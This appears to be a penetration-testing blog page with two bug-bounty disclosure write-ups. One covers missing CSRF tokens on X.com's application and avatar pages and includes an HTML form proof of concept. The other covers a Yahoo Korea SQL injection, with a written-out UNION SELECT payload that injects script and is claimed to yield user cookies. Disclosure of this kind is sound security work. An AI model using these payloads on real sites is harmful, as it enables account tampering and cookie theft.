Add new Application & Change User’s Avatar CSRF Vulnerability – X.com

July 19, 2013
 X.com bug bounty is running under the Paypal bug bounty program and i got paid .
Bug1  Add new Application : 
X.com provided option to add the new application in account settings. Due to missing of CSRF token this vulnerability successfully executed and unauthorized application is added anonymously in the user’s account .
CSRF Vulnerable URL : https://www.x.com/user/my-account/applications/new

To reproduce this vulnerability i have attached Proof Of Concept ..

Direct Download Link of POC :

https://dl.dropbox.com/u/18007092/x.com%20CSRF%20new%20Application.html

Bug2 Change User’s Avatar
X.com allow to change user’s default avatar.
I found the there is CSRF token is missing in avatar change module , this can be used to set  user’s default avtar forcefully.
CSRF Vulnerable URL : https://www.x.com/user/select_avatar/2
POC :
<form action=”https://www.x.com/user/select_avatar/2” method=”GET”>
<input type=”submit” name=”submit”>
</form>
Thank you Paypal & X.com for running such a good program – g4h Team.
We Provide Penetration Testing

Yahoo Korea SQL XSS vulnerability

August 9, 2011

Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed

Overview:

Yahoo Korea having Blog-shop which is one of the most famous sub domain in Korea .
A cross-site-scripting (XSS) vulnerability affecting blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.

Exploit Description :

It has Sql injection in the notice_read.html?key script . I was Successful for retrieving the yahoo users cookies from this SQL Injection by inserting JAVA-Script into the SQL Injection payload.

POC (Proof Of Concept ):

http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16’/**/UNION/**/SELECT/**/1,2,3,4,@@version,%
3Cscript%3Ealert(‘XSS HERE’);</script>,7,8,9,0,1,2,3,4,5,6,7–%20

Yahoo Koria XSS

Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)

Regard

Sandeep Kamble

We Provide Penetration Testing


We Provide Penetration Testing